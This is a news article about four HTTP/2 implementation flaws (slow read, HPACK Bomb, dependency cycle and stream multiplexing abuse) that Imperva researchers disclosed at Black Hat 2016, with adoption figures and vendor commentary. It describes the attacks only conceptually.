Researchers Discover Major HTTP/2 Flaws

The future building block of the World Wide Web (HTTP/2) has four high profile flaws, researchers at Imperva warned at this year’s Black Hat 2016 conference.

The HTTP/2 standard was finalised back in February 2015, with the aim to make web connections quicker and more secure, but the flaws discovered could allow hackers to crash servers and raises concern as the adoption of the HTTP/2 standard gathers steam.

Underlying Flaws

HTTP/2 is a major update to the Hypertext transfer Protocol (HTTP), which is the foundation of data communication for the World Wide Web.

The most widely used version of the standard (HTTP/1.1) was actually defined back in 1999, but according to W3Techs, 8.7 percent of all websites (roughly 85 million sites) now use HTTP/2.

This represents an almost fourfold increase from just 2.3 percent in December 2015.

Imperva Defense Center researchers warned that HTTP/2 introduces new mechanisms that effectively increase the attack surface of business critical web infrastructure which then becomes vulnerable to new types of attacks.

They examined HTTP/2 server implementations from Apache, Microsoft, NGINX, Jetty, and nghttp2, and discovered “exploitable vulnerabilities in all major HTTP/2 mechanisms” they reviewed.

HTTP/2 adoption

This included two “that are similar to well-known and widely exploited vulnerabilities in HTTP/1.x,” said the researchers. “It is likely that other implementations of the HTTP/2 protocol also suffer from these vulnerabilities.”

“The general web performance improvements and specific enhancements for mobile applications introduced in HTTP/2 are a potential boon for internet users,” said Amichai Shulman, co-founder and CTO of Imperva. “However, releasing a large amount of new code into the wild in a short time creates an excellent opportunity for attackers.

“While it is disturbing to see known HTTP 1.x threats introduced in HTTP/2, it’s hardly surprising. As with all new technology, it is important for businesses to perform due diligence and implement safeguards to harden the extended attack surface and protect critical business and consumer data from ever-evolving cyber threats.”

Attack Vectors

Imperva researchers detailed the four high-profile attack vectors they found. First off was a “slow read” attack, which calls on a malicious client to read responses very slowly and is apparently identical to the well-known Slowloris DDoS attack experienced by major credit card processors in 2010.

The second attack vector was  the “HPACK Bomb,” which is a  compression-layer attack that the researchers said resembles a zip bomb. “The attacker crafts small and seemingly innocent messages that turn into gigabytes of data on the server. This consumes all the server memory resources and effectively makes it unavailable,” the researchers warned.

The third attack vector was a “Dependency Cycle Attack”, which takes advantage of the flow control mechanisms that HTTP/2 introduced for network optimisation. The fourth and final attack vector was “Stream Multiplexing Abuse”, whereby the attacker uses flaws in the way servers implement the stream multiplexing functionality to crash the server.

Imperva warned firms to be aware of the security risks when adopting new technology and said businesses should implement a web application firewall (WAF) with virtual patching capabilities to help protect from cyber attack.

Quiz: What do you know about cybersecurity in 2016?